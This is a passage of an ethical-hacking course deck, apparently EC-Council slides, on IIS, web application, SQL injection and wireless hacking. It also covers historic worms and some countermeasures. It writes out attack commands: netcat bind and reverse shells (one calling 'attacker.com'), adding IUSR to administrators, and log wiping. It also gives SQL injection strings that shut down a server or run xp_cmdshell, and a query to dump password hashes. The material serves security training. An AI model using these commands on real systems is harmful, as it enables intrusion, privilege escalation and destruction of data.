  • 328. EC-Council Hacking Tool: execiis-win32.exe This tool exploits IIS directory traversal and takes command from cmd and executes them on the IIS Server
  • 329. EC-Council Hacking Tool: Unicodeuploader.pl ~ Unicode upload creator (unicodeloader.pl) works as follows: Two files (upload.asp and upload.inc - have them in the same dir as the PERL script) are built in the webroot (or any where else) using echo and some conversion strings. These files allow you to upload any file by simply surfing with a browser to the server. 1. Find the webroot 2. perl unicodeloader target: 80 'webroot' 3. surf to target/upload.asp and upload nc.exe 4. perl unicodexecute3.pl target: 80 'webroot/nc -l -p 80 -e cmd.exe' 5. telnet target 80 Above procedure will drop you into the shell on the box.
  • 330. EC-Council Hacking Tool: cmdasp.asp ~ After uploading nc.exe to the web server, you can shovel a shell back to your pc. ~ Shoveling a shell back to the attacker's system is easy: 1. Start a netcat listener on the attacker's system: c:>nc.exe -l -p 2002 2. Use cmdasp.asp to shovel a netcat shell back to the listener: c:inetpubscriptsnc.exe -v -e cmd.exe attacker.com 2002
  • 331. EC-Council Escalating Privileges on IIS ~ On IIS 4, the LPC ports can be exploited using hk.exe ~ hk.exe will run commands using SYSTEM account on windows pertaining to intruders to simply add the IUSR or IWAM account to the local administrator's group. hk.exe net localgroup administrators IUSR_machinename /add ~ Note: LPC port vulnerability is patched on IIS 5.0
  • 332. EC-Council Hacking Tool: iiscrack.dll ~ iiscrack.dll works like upload.asp and cmd.asp. ~ iiscrack.dll provides a form- based input for attackers to enter commands to be run with SYSTEM privileges. ~ An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:inetpubscripts using upload.asp and execute it via the web browser using: http://victim.com/scripts/idq.dll ~ The attacker now has the option to run virtually any command as SYSTEM
  • 333. EC-Council Hacking Tool: ispc.exe ~ ISPC.exe is a Win32 client that is used to connect a trojan ISAPI DLL (idq.dll). ~ Once the trojan DLL is cpied to the victim webserver (/sripts/idq.dll), the attacker can execute ispc.exe and immediately obtain a remote shell running as SYSTEM. c:>ispc.exe victim.com/scripts/idq.dll 80
  • 334. EC-Council Unspecified Executable Path Vulnerability ~ When executables and DLL files are not preceded by a path in the registry (eg. explorer.exe does not have a fixed path by default). ~ Windows NT 4.0 / 2000 will search for the file in the following locations in this order: • the directory from which the application loaded. • the current directory of the parent process, • ...system32 • ...system • the windows directory • the directories specified in the PATH environment variable
  • 335. EC-Council Hacking Tool: CleanIISLog ~ This tool clears the log entries in the IIS log files filtered by IP address. ~ An attacker can easily cover his trace by removing entries based on his IP address in W3SVC Log Files.
  • 336. EC-Council File System Traversal Counter measures ~ Microsoft recommends setting the NTFS ACLS on cmd.exe and several other powerful executables to Administration and SYSTEM: Full Control only. ~ Remove executable permission to IUSR account. ~ This should stop directory traversal in IIS. ~ Apply Microsoft patches and Hotfixes regularly.
  • 337. EC-Council Solution: UpdateExpert ~ Update Expert is a Windows administration program that helps you secure your systems by remotely managing service packs and hot fixes. ~ Microsoft constantly releases updates for the OS and mission critical applications, which fix security vulnerabilities and system stability problems. ~ UpdateExpert enhances security, keeps systems up to date, eliminates sneaker-net, improves system reliability and QoS
  • 338. EC-Council cacls.exe utility ~Built-in Windows 2000 utility (cacls.exe) can set access control list (ACLs) permissions globally. ~Let's say you want to change permissions on all executable files to System:Full, Administrators:Full, C:>cacls.exe c:myfolder*.exe /T /G System:F Administrators:F
  • 339. EC-Council Network Tool: Whisker ~ Whisker is an automated vulnerability scanning software which scans for the presence of exploitable files on remote Web servers. ~ Refer the output of this simple scan given below and you will see Whisker has identified several potentially dangerous files on this IIS5Server
  • 340. EC-Council Network Tool: Stealth HTTP Scanner http://www nstalker.com/nstealth/ ~N-Stealth 5 is an impressive Web vulnerability scanner that scans over 18000 HTTP security issues. ~Stealth HTTP Scanner writes scan results to an easy HTML report. ~N-Stealth is often used by security companies for penetration testing and system auditing, specifically for testing Web servers.
  • 341. EC-Council Hacking Tool: WebInspect ~ WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks. ~ It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks. ~ It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages.
  • 342. EC-Council Network Tool: Shadow Security Scanner http://www.safety-lab.com ~ Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments. ~ Shadow Security Scanner includes vulnerability auditing modules for many systems and services. ~ These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL,IBM DB2,Oracle,MySQL, PostgressSQL, Interbase, MiniSQL and more.
  • 343. EC-Council Countermeasures ~ IISLockdown: • IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories. • It disables Web Distributed Authoring and Versioning (WebDAV). • It installs the URLScan ISAPI filter. ~ URLScan: • UrlScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
  • 344. EC-Council Summary ~ Web servers assume critical importance in the realm of Internet security. ~ Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often. ~ The inherent security risks owing to compromised web servers have impact on the local area networks that host these web sites, even the normal users of web browsers. ~ Looking through the long list of vulnerabilities that had been discovered and patched over the past few years provide an attacker ample scope to plan attacks to unpatched servers. ~ Different tools/exploit codes aids an attacker perpetrate web server hacking. ~ Countermeasures include scanning, for existing vulnerabilities and patching them immediately, anonymous access restriction, incoming traffic request screening and filtering.
  • 345. Ethical Hacking Module XII Web Application Vulnerabilities
  • 346. EC-Council Module Objective ~ Understanding Web Application Security ~ Common Web Application Security Vulnerabilities ~ Web Application Penetration Methodologies ~ Input Manipulation ~ Authentication And Session Management ~ Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth ~ Countermeasures
  • 347. EC-Council Understanding Web Application Security Firewall Firewall Database Web App Scripts Web Server User
  • 348. EC-Council Common Web Application Vulnerabilities ~ Reliability of Client-Side Data ~ Special Characters that have not been escaped ~ HTML Output Character Filtering ~ Root accessibility of web applications ~ ActiveX/JavaScript Authentication ~ Lack of User Authentication before performing critical tasks.
  • 349. EC-Council Web Application Penetration Methodologies ~Information Gathering and Discovery • Documenting Application / Site Map • Identifiable Characteristics / Fingerprinting • Signature Error and Response Codes • File / Application Enumeration – Forced Browsing – Hidden Files – Vulnerable CGIs – Sample Files ~Input/Output Client-Side Data Manipulation
  • 350. EC-Council Hacking Tool: Instant Source http://www.blazingtool.com ~Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer! ~The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.
  • 351. EC-Council Hacking Tool: Lynx http://lynx.browser.org Lynx is a text-based browser used for downloading source files and directory links.
  • 352. EC-Council Hacking Tool: Wget www.gnu.org/software/wget/wget.html ~ Wget is a command line tool for Windows and Unix that will download the contents of a web site. ~ It works non-interactively, so it will work in the background, after having logged off. ~ Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded. ~ Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.
  • 353. EC-Council Hacking Tool: Black Widow http://softbytelabs .com ~Black widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. ~Use it to scan a site and create a complete profile of the site's structure, files, E- mail addresses, external links and even link errors.
  • 354. EC-Council Hacking Tool: WebSleuth ~ http://sandsprite.com/sleuth/ ~ WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.
  • 355. EC-Council Hidden Field Manipulation ~ Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server. ~ Hidden fields serve as a mean for the web application to pass information between different applications. ~ Using this method, an application may pass the data without saving it to a common backend system (typically a database.) ~ A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client. ~ Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server. ~ By changing the value the entire logic between the different application parts, the application is damaged and manipulated to the new value.
  • 356. EC-Council Input Manipulation ~URL Manipulation -CGI Parameter Tampering ~HTTP Client-Header Injection ~Filter/Intrusion Detection Evasion ~Protocol/Method Manipulation ~Overflows
  • 357. EC-Council What is Cross Side Scripting (XSS)? ~ A Web application vulnerable to XSS allows a user to inadvertently send malicious data to self through that application. ~ Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them. ~ These links cause client side scripting languages )VBScript, JavaScript etc,) of the attacker's choice to execute on the victim's browser. ~ XSS vulnerabilities are caused by a failure in the web application to properly validate user input.
  • 358. EC-Council Authentication And Session Management ~Brute/Reverse Force ~Session Hijacking ~Session Replay ~Session Forgoing ~Page Sequencing
  • 359. EC-Council Traditional XSS Web Application Hijack Scenario - Cookie stealing ~User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application. ~The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc,) and make it load automatically without requiring user intervention.
  • 360. EC-Council XSS Countermeasures ~ As a web application user, there are a few ways to protect yourselves from XSS attacks. ~ The first and the most effective solution is to disable all scripting language support in your browser and email reader. ~ If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages. ~ Proxy servers can help filter out malicious scripting in HTML.
  • 361. EC-Council Buffer Overflow in WINHLP32.EXE ~ A buffer-overrun vulnerability in WINHLP32.EXE could result in the execution of arbitrary code on the vulnerable system. ~ This vulnerability stems from a flaw in the Item parameter within WinHLP Command. ~ This exploit would execute in the security context of the currently logged on user. ~ Microsoft has released Windows 2000 Service Pack 3 (SP3), which includes a fix for this vulnerability.
  • 362. EC-Council Hacking Tool: Helpme2.pl ~ Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability. ~ This tool generates an HTML file with a given hidden command. ~ When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.
  • 363. EC-Council Hacking Tool: WindowBomb An email sent with this html file attached will create pop- up windows until the PC's memory gets exhausted. JavaScript is vulnerable to simple coding such as this.
  • 364. EC-Council Hacking Tool: IEEN http://www.securityfriday.com/ToolDownload/IEen ~IEEN remotely controls Internet Explorer using DCOM. ~If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.
  • 365. EC-Council Summary ~ Attacking web applications is the easiest way to compromise hosts, networks and users. ~ Generally nobody notices web application penetration, until serious damage has been done. ~ Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures. ~ Various tools help the attacker to view the source codes and scan for security holes. ~ The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / “secure” cookies are advocated instead of using hidden fields, which are easily manipulated by attackers. ~ A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system. ~ If the application accepts only expected input, then the XSS can be significantly reduced.
  • 366. Ethical Hacking Module XIII Web Based Password Cracking Techniques
  • 367. EC-Council Module Objective ~ HTTP Authentication Basic & Digest ~ NTLM Authentication ~ Certificate Based Authentication ~ Forms Based Authentication ~ Microsoft Passport ~ Password Guessing ~ WebCracker ~ Brutus ~ WWWHACK ~ ObiWan Password Cracker
  • 368. EC-Council Basic Authentication ~ Basic authentication is the most basic form of authentication to web applications. ~ The authentication credentials are sent clear-text with base64 encryption (can be decoded) and is subject to eavesdropping and replay attacks. ~ The use of 128 bit SSL encryption can thwart attacks.
  • 369. EC-Council Digest Authentication ~ Digest authentication is based on a challenge-response authentication model. ~ The user makes a request without authentication credentials and the Web Server replies with a WWW- Authenticate header indicating credentials. ~ Instead of sending the username and password the server challenges the client with random nonce. ~ The client responds with the message digest of the username/password.
  • 370. EC-Council NTLM Authentication ~ NTLM Authentication is Microsoft's proprietary NT LAN Manager authentication algorithm over HTTP. It works on Microsoft Internet Explorer only. ~ Integrated Windows authentication works the same way as Message Digest authentication.
  • 371. EC-Council Certificate Based Authentication ~ Certificate authentication is stronger than other authentication mechanisms ~ Certificated authentication uses public0key cryptography and digital certificate to authenticate a user. Certificates can be stored in smart cards for even greater security. ~ There is no current known attacks against PKI security so far.
  • 372. EC-Council Microsoft Passport Authentication ~ Single signon is the term used to represent a system whereby users need only remember one username and password, and be authenticated for multiple services. ~ Passport is Microsoft's universal single sign-in (SSI) platform. ~ It enables the use of one set of credentials to access any Passport enabled site such as MSN, Hotmail and MSN Messenger. ~ Microsoft encourages third-party companies to use Passport as a Universal authentication platform.
  • 373. EC-Council Forms-Based Authentication ~ It is highly customizable authentication mechanism that uses a form composed of HTML with <FORM> and <INPUT> tags delineating fields for users to input their username/password. ~ After the data input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits. ~ Forms based authentication technique is the popular authentication technique on the internet.
  • 374. EC-Council Hacking Tool: WinSSLMiM http://www.securiteinfo.com/outils/WinSSLMiM.shtml ~ WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates. ~ It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000. ~ Usage: - FakeCert: fc -h - WinSSLMiM: wsm -h
  • 375. EC-Council Password Guessing ~ Password guessing attacks can be carried out manually or via automated tools. ~ Password guessing can be performed against all types of Web Authentication The common passwords used are: root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]
  • 376. EC-Council Hacking Tool: WebCracker WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing. ~It keys on "HTTP 302 Object Moved" response to indicate successful guess. ~It will find all successful guesses given in a username/password.
  • 377. EC-Council Hacking Tool: Brutus http://www.hoobie.net/brutus/ Brutus is a generic password guessing tool that cracks various authentication. ~Brutus can perform both dictionary attacks and brute- force attacks where passwords are randomly generated from a given character. ~Brutus can crack the following authentication types: ~HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet
  • 378. EC-Council Hacking Tool: ObiWan http://www.phenoelit.de/o biwan/docu.html ~ObiWan is a powerful Web password cracking tool. It can work through a proxy. ~ObiWan uses wordlists and alternations of numeric or alpha-numeric characters as possible as passwords. ~Since Webservers allow unlimited requests it is a question of time and bandwidth to break into a server system.
  • 380. EC-Council Dictionary Maker You can download dictionary files from the Internet or generate your own.
  • 381. EC-Council Hacking Tool: PassList Passlist is another character based password generator.
  • 382. EC-Council Query String ~ The query string is the extra bit of data in the URL after the question mark (?) that is used to pass variables. ~ The query string is used to transfer data between client and server. Example: http://www.mail.com/mail.asp?mailbox=sue& company=abc%20com You can attempt to change Joe's mailbox by changing the URL to: http://www.mail.com/mail.asp?mailbox=sue& company=abc%20com
  • 383. EC-Council Hacking Tool: cURL http://curl.haxx.se cURL is a multi-protocol transfer library. ~cURL is a free and easy-to-use client side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. ~cURL supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, Kerberos, HTTP form based upload, proxies, cookies, user+password authentication, file transfer resume, http proxy tunneling and more
  • 384. EC-Council Cookies ~ Cookies are popular form of session management. ~ Cookies are often used to store important fields such as usernames and account numbers. ~ Cookies can be used to store any data and all the fields can be easily modified using a program like CookieSpy
  • 385. EC-Council Hacking Tool: ReadCookies.html Read cookies stored on the computer. this tool can be used for stealing cookies or cookies hijacking.
  • 386. EC-Council Hacking Tool: SnadBoy http://www.snadboy.com "Snadboy Revelation" turns back the asterisk in password fields to plain text passwords.
  • 387. EC-Council Summary ~ The "basic" authentication scheme, the simplest method of authentication and one of the most commonly used authentication method sends authentication details in clear. ~ Digest authentication, never sent across the network user's credentials in the clear, but transmits as an MD5 digest of the user's credentials. ~ NTLM, a Microsoft-proprietary protocol authenticates users and computers based on an authentication challenge and response. ~ Certificated authentication which uses public key cryptography and digital certificate to authenticate is stronger than other authentication mechanisms. ~ Forms based Authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials. ~ Attackers make use of different tools to get better of the authentication protocols. ~ It is therefore necessary to evaluate the most secure option while designing web applications to counter cracking activities.
  • 389. EC-Council Module Objective ~ What is SQL Injection? ~ Exploiting the weakness of Server Side Scripting ~ Using SQL Injection techniques to gain access to a system ~ SQL Injection Scripts ~ Attacking Microsoft SQL Servers ~ MSSQL Password Crackers ~ Prevention and Countermeasures
  • 391. EC-Council OLE DB Errors The user filled fields are enclosed by single quotation marks ('). So a simple test of the form would be to try using (') as the username. Lets us see what happens if we just enter ' in a form that is vulnerable to SQL insertion. If you get this error, then we can try SQL injection techniques.
  • 392. EC-Council Input Validation attack Input validation attack occurs here on a website
  • 393. EC-Council Login Guessing & Insertion ~ The attacker can try to login without a password. Typical usernames would be 1=1 or any text within single quotes. ~ The most common problem seen on Microsoft MS-SQL boxes is the default <blank>sa password. ~ The attacker can try to guess the username of an account by querying for similar user names (ex: ‘ad%’ is used to query for “admin”). ~ The attacker can insert data by appending commands or writing queries.
  • 394. EC-Council Shutting Down SQL Server ~ One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes it to shutdown, immediately stopping the Windows service. Username: ' ; shutdown with nowait; -- Password [Anything] ~ This can happen if the script runs the following query: select userName from users where userName='; shutdown with nowait;-' and user_Pass=' '
  • 395. EC-Council Extended Stored Procedures ~ There are several extended stored procedures that can cause permanent damage to a system. ~ We can execute an extended stored procedure using our login form with an injected command as the username as follows: Username: ' ; exec master..xp_xxx; -- Password: [Anything] Username: ' ; exec master..xp_cmdshell ' iisreset' ; -- Password: [Anything]
  • 396. EC-Council SQL Server Talks! This command uses the 'speech.voicetext' object, causing the SQL Server to speak:
  • 397. EC-Council Hacking Tool: SQLDict http://ntsecurity.nu/cgi- bin/download/sqldict.exe.pl ~"SQLdict" is a dictionary attack tool for SQL Server. ~It lets you test if the accounts are strong enough to resist an attack or not.
  • 398. EC-Council Hacking Tool: SQLExec ~This tool executes commands on compromised MIcrosoft SQL Servers using xp_cmdshell stored procedure. ~It uses default sa account with NULL password. But this can be modified easily. USAGE: SQLExec www.target.com
  • 399. EC-Council Hacking Tool: sqlbf http://www.cqure.net/tools.jsp?id=10 ~ Sqlbf is a SQL Sever Password Auditing tool. This tool should be used to audit the strength of Microsoft SQL Server passwords offline. The tool can be used either in BruteForce mode or in Dictionary attack mode. The performance on a 1GHZ pentium (256MB) machine is around 750,000 guesses/sec. ~ To be able to perform an audit, one needs the password hashes that are stored in the sysxlogins table in the master database. ~ The hashes are easy to retrieve although you need a privileged account to do so, like an sa account. The query to use would be: select name, password from master..sysxlogins ~ To perform a dictionary attack on the retrieved hashes: sqlbf -u hashes.txt -d dictionary.dic -r out.rep
  • 400. EC-Council Hacking Tool: SQLSmack ~ SQLSmack is a Linux based Remote Command Execution for MSSQL. ~ The tool allows when provided with a valid username and password on a remote MS SQL Server to execute commands by piping them through the stored procedure master..xp_cmdshell
  • 401. EC-Council Hacking Tool: SQL2.exe ~ SQL2 is a UDP Buffer Overflow Remote Exploit hacking tool.
  • 402. EC-Council Preventive Measures ~ Minimize Privileges of Database Connection ~ Disable verbose error messages ~ Protect the system account ‘sa’ ~ Audit Source Code • Escape Single Quotes • Allow only good input • Reject known bad input • Restrict length of input
  • 403. EC-Council Summary ~ SQL Injection is an attack methodology that targets the data residing in a database through the firewall that shields it. ~ It attempts to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. ~ Database footprinting is the process of mapping out the tables on the database and is a crucial tool in the hands of an attacker. ~ Exploits occur due to coding errors as well as inadequate validation checks . ~ Prevention involves enforcing better coding practices and database administration procedures.
  • 404. Ethical Hacking Module XV Hacking Wireless Networks
  • 405. EC-Council Module Objective ~ Introduction to 802.11 ~ What is WEP? ~ Finding WLANs ~ Cracking WEP Keys ~ Sniffing Traffic ~ Wireless DoS attacks ~ WLAN Scanners ~ WLAN Sniffers ~ Securing Wireless Networks ~ Hacking Tools
  • 406. EC-Council Introduction to Wireless Networking ~ Wireless networking technology is becoming increasingly popular but at the same time has introduced many security issues ~ The popularity in wireless technology is driven by two primary factors – convenience and cost. ~ A Wireless local area network (WLAN) allows workers to access digital resources without being locked into their desks. ~ Laptops could be carried into meetings or even into Starbucks café tapping into the wireless network. This convenience has become affordable.
  • 407. EC-Council What is 802.11x ? ~ Wireless LAN standards are defined by the IEEE’s 802.11 working group. WLANs come in three flavors: ~ 802.11b • Operates in the 2.4000GHz to 2.2835GHz frtequency range and can operate at up to 11 megabits per second. ~ 802.11a • Operates in the 5.15-5.35GHz to 5.725-5.825GHz frequency range and can operate at up to 54 megabits per second. ~ 802.11g • Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at up to 54 megabits per second. Note: WEP standards are defined in the 802.11 standard and not the individual standards. WEP vulnerabilities have the potential to affect all flavors of 802.11 networks.
  • 408. EC-Council Setting Up WLAN ~ When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network settings such as IP address and a subnet mask. ~ The channel is a number between 1and 11 (1 and 13in Europe) and designates the frequency on which the network will operate. ~ The SSID is an alphanumeric string that differentiates networks operating on the same channel. ~ It is essentially a configurable name that identifies an individual network. These settings are important factors when identifying WLANs and sniffing traffic.
  • 409. EC-Council SSIDs ~ The SSID is a unique identifier that wireless networking devices use to establish and maintain wireless connectivity ~ SSID acts as a single shared password between access points and clients. ~ Security concerns arise when the default values are not changed, as these units can be easily compromised. ~ A non-secure access mode, allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as “any.”
  • 410. EC-Council What is WEP? ~ WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs. ~ Wired LANs typically employ physical controls to prevent unauthorized users from connecting to the network and viewing data. In a wireless LAN, the network can be accessed without physically connecting to the LAN. ~ IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping on a network. This is accomplished by encrypting data with the RC4 encryption algorithm.
  • 411. EC-Council MAC Sniffing & AP Spoofing ~ MAC addresses are easily sniffed by an attacker since they must appear in the clear even in when WEP is enabled. ~ An attacker can use those “advantages” in order to masquerade as a valid MAC address by programming the wireless card, and get into the wireless network and use the wireless pipes. ~ Spoofing MAC address is very easy. Using packet- capturing software, an attacker can determine a valid MAC address using one packet. ~ To perform a spoofing attack, an attacker must set up an access point (rogue) near the target wireless network or in a place where a victim may believe that wireless Internet is available.
  • 412. EC-Council Denial of Service attacks ~ Wireless LANs are susceptible to the same protocol-based attacks that plague wired LAN ~ WLANs send information via radio waves on public frequencies, thus they are susceptible to in advertent or deliberate interference from traffic using the same radio band.
  • 413. EC-Council Hacking Tool: NetStumbler http://www.netstumbler.org ~ Netstumbler is a high level WLAN scanner. It operates by sending a steady stream of broadcast packets on all possible channels. ~ Access Points (AP) respond to broadcast packets to verify their existence, even if beacons have been disabled. ~ NetStumbler displays: • Signal Strength • MAC Address • SSID • Channel details
  • 414. EC-Council Hacking Tool: AiroPeek http://www.wildpackets.com ~Airopeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, Apple Talk, NetBUI and IPX. ~In addition, AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates.
  • 415. EC-Council Hacking Tool: Airsnort http://airsnort.shmoo.com/ ~ AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. ~ AirSnort requires approximately 5-10 million encrypted packets to be gathered. ~ Once enough packets have been gathered, AirSnort can guess the encryption password in under a second.
  • 416. EC-Council Hacking Tool: Kismet ~ Kismet is a 802.11b wireless network sniffer which separates and identifies different wireless networks in the area. ~ Kismet works with any wireless card which is capable of reporting raw packets.
  • 417. EC-Council WEPCrack ~ WEPCrack is an open source tool for breaking 802.11 WEP secret keys. ~ While Airsnort has captured the media attention, WEPCrack was the first publically available code that demonstrated the above attack. ~ The current tools are Perl based and are composed of the following scripts: WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl
  • 418. EC-Council Other Tools ~ Network discovery tools run on 802.11 stations and passively monitor beacon and probe response frames. They typically display discovered devices by SSID, channel, MAC address and location. ~ Vulnerability assessment tools, in addition to network discovery, sniff traffic to spot security policy violations. ~ Traffic monitoring and analysis tools also provide discovery and vulnerability alerting. In addition, they capture and examine packet content. ~ IDSes may use signature analysis, protocol inspection, rules enforcement and/or anomaly detection.
  • 419. EC-Council WIDZ, Wireless Intrusion Detection System ~WIDZ version 1 is a proof of concept IDS system for 802.11 that guards APs and monitors local for potentially malevolent activity. ~It detects scans, association floods, and bogus/Rogue APs. It can easily be integrated with SNORT or RealSecure.
  • 420. EC-Council Securing Wireless Networks ~ MAC Address Filtering This method uses a list of MAC addresses of client wireless network interface cards that are allowed to associate with the access point. ~ SSID (NetworkID) The first attempt to secure wireless network was the use of Network ID (SSID). When a wireless client wants to associate with an access point, the SSID is transmitted during the process. The SSID is a seven digit alphanumeric id that is hard coded into the access point and the client device. ~ Firewalls Using a firewall to secure a wireless network is probably the only security feature that will prevent unauthorized access.
  • 421. EC-Council Out of the box security
  • 422. EC-Council Radius: used as additional layer in the security
  • 423. EC-Council Maximum Security: Add VPN to Wireless LAN
  • 424. EC-Council Summary ~ A wireless enables a mobile user to connect to a local area network (LAN) through a wireless (radio) connection. ~ Wired Equivalent Privacy (WEP), a security protocol, specified in the IEEE Wi-Fi standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. ~ WEP is vulnerable because of relatively short IVs and keys that remain static. ~ Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker as they appear in the clear format. Spoofing MAC address is also easy. ~ If an attacker holds wireless equipment nearby a wireless network, he will be able to perform a spoofing attack by setting up an access point (rogue) near the target wireless network. ~ Wireless networks are extremely vulnerable to DoS attacks. ~ A variety of hacking and monitoring tools are available for the Wireless networks as well. ~ Securing wireless networks include adopting a suitable strategy as MAC address filtering, Fire walling or a combination of protocol based measures.
  • 426. EC-Council Module Objective ~ Chernobyl ~ ExploreZip ~ I Love You ~ Melissa ~ Pretty Park ~ Code Red Worm ~ W32/Klez ~ BugBear ~ W32/Opaserv Worm ~ Anti-Virus Software
  • 427. EC-Council W32.CIH.Spacefiller (a.k.a Chernobyl) ~ Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance. ~ If infected, Chernobyl will erase data on your hard drive, and may even keep your machine from booting up at all. ~ There are several variants in the wild. each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month.
  • 428. EC-Council Win32/Explore.Zip Virus ~ ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives. ~ When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails itself to any one who send you an e-mail. ~ ExploreZip arrives as an email attachment. The message will most likely come from someone you know, and the body of the message will read: "I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.
  • 429. EC-Council I Love You Virus ~ LoveLetter is a Win32-based e-mail worm. It overwrites certain on your hard drive(s) and sends itself out to everyone in your Microsoft Outlook address book. ~ LoveLetter arrives as an email attachment named: LOVE-LETTER- FOR-YOU.TXT.VBS though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs
  • 430. EC-Council What is SQL Insertion Vulnerability? ~ User Controlled Data is placed into an SQL query without being validated for correct format or embedded escape strings. ~ Affects majority of applications which use a database backend and don't force variable types. ~ At least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable. ~ Improper validation in CFML, ASP, JSP and PHP are the most frequent causes.
  • 431. EC-Council Melissa Virus ~ Melissa is a Microsoft Word macro virus. ~ Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in your address book. ~ It does not corrupt any data on your hard drive or make your computer crash. It just changes some Word settings and sends itself to the people you don't want to infect. ~ Melissa Virus Infection • Melissa arrives as an email attachment. • The subject of the message containing the virus will read: "Important message from" followed by the name of the person whose email account it was sent from. • The body of the message reads: Here's the document you asked for...don't show anyone else ;-) Double clicking the attached Word document (typically named LIST.DOC) will infect your machine.
  • 432. EC-Council Pretty Park ~Pretty Park is a privacy invading worm. Every 30 seconds, it tries to e-mail itself to the e-mail addresses in your Microsoft Outlook address book. ~It has also been reported to connect your machine to a custom IRC channel for the purpose of retrieving passwords from your system. ~Pretty park arrives as an email attachment. Double clicking the PrettyPark.exe or Files32.exe program infects your computer. ~You may see the Pipes screen after running the executable.
